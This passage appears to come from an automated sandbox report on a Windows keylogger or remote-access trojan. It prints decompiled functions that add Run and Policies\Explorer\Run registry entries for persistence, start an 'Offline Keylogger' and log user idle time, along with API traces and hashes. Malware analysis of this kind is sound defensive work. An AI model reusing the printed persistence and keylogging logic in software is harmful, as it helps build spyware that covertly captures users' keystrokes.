                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                        • String ID: [ ${ User has been idle for $ ]$ minutes }
                                        • API String ID: 615312007-3343415809
                                        • Opcode ID: 0e15a73bea33ccb5e514cff3bf8d1caab7dc6e5c798de36ef3d90741790d0d5c
                                        • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                        • Opcode Fuzzy Hash: 0e15a73bea33ccb5e514cff3bf8d1caab7dc6e5c798de36ef3d90741790d0d5c
                                        • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409D3C, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 102sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                          • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                          • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                          • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409DDC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                        • Sleep.KERNELBASE(00000BB8), ref: 00409DFA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409E57
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                        • exit.MSVCRT ref: 00409E77
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                        • String ID: 2.7.2 Pro$override$pth_unenc
                                        • API String ID: 3602623569-3893205188
                                        • Opcode ID: 24e136f94a58c62363002b572ecda5687b4239bdf0234719c2167b28e35c3464
                                        • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                        • Opcode Fuzzy Hash: 24e136f94a58c62363002b572ecda5687b4239bdf0234719c2167b28e35c3464
                                        • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00407D53, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 82COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
				char _v20;
				void* _t13;
				void* _t15;
				char* _t26;
				void* _t27;
				void* _t32;
				void* _t35;

				_t26 = "\"";
				if(_a4 == 1) {
					_t35 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t3 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28); // executed
					_t27 = _t35 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a8 == 1) {
					_t32 = _t27 - 0x10;
					L0041416A();
					L00414146();
					_t7 =  &_a16; // 0x415a24
					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
					_t27 = _t32 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a12 == 1) {
					L0041416A();
					L00414146();
					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
					return _t15;
				}
				return _t13;
			}










                                        0x00407d60
                                        0x00407d6a
                                        0x00407d71
                                        0x00407d7a
                                        0x00407d84
                                        0x00407d8c
                                        0x00407d99
                                        0x00407d9e
                                        0x00407da4
                                        0x00407da4
                                        0x00407dae
                                        0x00407db5
                                        0x00407dbe
                                        0x00407dc8
                                        0x00407dd0
                                        0x00407ddd
                                        0x00407de2
                                        0x00407de8
                                        0x00407de8
                                        0x00407df2
                                        0x00407e02
                                        0x00407e0c
                                        0x00407e21
                                        0x00407e2c
                                        0x00000000
                                        0x00407e2c
                                        0x00407e36

                                        APIs
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407DA4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                          • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                          • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B7D5
                                          • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B7E3
                                          • Part of subcall function 0040B7B9: RegSetValueExW.KERNELBASE(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                          • Part of subcall function 0040B7B9: RegCloseKey.KERNELBASE(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B801
                                          • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 0040B810
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407DBE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407DC8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407DE8
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407E02
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407E0C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407E2C
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407D8F, 00407DD3
                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00407E17
                                        • $ZA, xrefs: 00407DD0, 00407D8C
                                        • C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, xrefs: 00407D5F
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                        • String ID: $ZA$C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                        • API String ID: 111787555-3680190401
                                        • Opcode ID: 0cb525aa58568e824a8d200d7c719720f3b78d1802e43ba3bcba88e74aab0662
                                        • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                        • Opcode Fuzzy Hash: 0cb525aa58568e824a8d200d7c719720f3b78d1802e43ba3bcba88e74aab0662
                                        • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004129EB, Relevance: 21.1, APIs: 14, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6F5E5DF0), ref: 00412A90
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                        • String ID:
                                        • API String ID: 3435050692-0
                                        • Opcode ID: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                        • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                        • Opcode Fuzzy Hash: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                        • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405180, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 71threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 26%
                                        			E00405180(void* __ecx, char _a4) {
				char _v5;
				char _v6;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t29;
				void* _t32;
				char* _t33;
				void* _t36;

				_t19 = __ecx;
				 *((char*)(__ecx + 0x3c)) = 1;
				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
				E00405156(__ecx);
				_t33 = "Offline Keylogger Started";
				if( *0x41b154 != 0x32) {
					_t36 = _t36 - 0x10;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
					E00405DD3(__ecx);
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
				E0041203B();
				CreateThread(0, 0, E0040528A, _t19, 0, 0); // executed
				if( *_t19 == 0) {
					CreateThread(0, 0, E0040526A, _t19, 0, 0); // executed
				}
				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0); // executed
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}












                                        0x00405185
                                        0x00405190
                                        0x00405194
                                        0x0040519c
                                        0x004051a8
                                        0x004051ad
                                        0x004051af
                                        0x004051b9
                                        0x004051c1
                                        0x004051c1
                                        0x004051d0
                                        0x004051e4
                                        0x004051ea
                                        0x00405204
                                        0x00405208
                                        0x00405214
                                        0x00405214
                                        0x00405220
                                        0x00405225
                                        0x0040522f

                                        APIs
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                          • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                        • CreateThread.KERNELBASE(00000000,00000000,0040528A,0041B900,00000000,00000000), ref: 00405204
                                        • CreateThread.KERNELBASE(00000000,00000000,0040526A,0041B900,00000000,00000000), ref: 00405214
                                        • CreateThread.KERNELBASE(00000000,00000000,00405299,0041B900,00000000,00000000), ref: 00405220
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                        • String ID: Offline Keylogger Started$[INFO]
                                        • API String ID: 2375278975-3749928830
                                        • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                        • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                        • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                        • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413FA4, Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x416e50);
				_push(0x414130);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x41c26c =  *0x41c26c | 0xffffffff;
				 *0x41c270 =  *0x41c270 | 0xffffffff;
				 *(__p__fmode()) =  *0x41c264;
				_t24 = __p__commode();
				_t47 =  *0x41c260;
				 *_t24 =  *0x41c260;
				 *0x41c268 = _adjust_fdiv;
				_t27 = E00404F3A( *_adjust_fdiv);
				_t60 =  *0x41b190; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E0041412C);
					_pop(_t47);
				}
				E0041411A(_t27);
				_push(0x41b0e8);
				_push(0x41b0e4);
				L00414114();
				_v112 =  *0x41c25c;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
				_push(0x41b0e0);
				_push(0x41b000); // executed
				L00414114(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while(1) {
						__eflags =  *_t54 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				L7:
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t68 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041410E();
				return _t41;
			}

























                                        0x00413fa7
                                        0x00413fa9
                                        0x00413fae
                                        0x00413fb9
                                        0x00413fba
                                        0x00413fc7
                                        0x00413fcc
                                        0x00413fd1
                                        0x00413fd8
                                        0x00413fdf
                                        0x00413ff2
                                        0x00413ff4
                                        0x00413ffa
                                        0x00414000
                                        0x00414009
                                        0x0041400e
                                        0x00414013
                                        0x00414019
                                        0x00414020
                                        0x00414026
                                        0x00414026
                                        0x00414027
                                        0x0041402c
                                        0x00414031
                                        0x00414036
                                        0x00414040
                                        0x00414059
                                        0x0041405f
                                        0x00414064
                                        0x00414069
                                        0x00414076
                                        0x00414078
                                        0x0041407e
                                        0x004140ba
                                        0x004140ba
                                        0x004140bd
                                        0x00000000
                                        0x00000000
                                        0x004140bf
                                        0x004140c0
                                        0x004140c0
                                        0x00414080
                                        0x00414080
                                        0x00414080
                                        0x00414081
                                        0x00414084
                                        0x00414086
                                        0x00414091
                                        0x00414093
                                        0x00414093
                                        0x00414094
                                        0x00414094
                                        0x00414091
                                        0x00414097
                                        0x00414097
                                        0x0041409b
                                        0x00000000
                                        0x00000000
                                        0x004140a1
                                        0x004140a8
                                        0x004140ae
                                        0x004140b2
                                        0x004140c7
                                        0x004140b4
                                        0x004140b4
                                        0x004140b4
                                        0x004140d3
                                        0x004140d8
                                        0x004140dc
                                        0x004140e2
                                        0x004140e7
                                        0x004140e9
                                        0x004140ec
                                        0x004140ed
                                        0x004140ee
                                        0x004140f5

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                        • String ID:
                                        • API String ID: 801014965-0
                                        • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                        • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                        • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                        • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409823, Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E00409823(intOrPtr _a4) {
				unsigned int _v8;
				signed char* _v12;
				char _v13;
				void* _v20;
				void* _v24;
				char _v40;
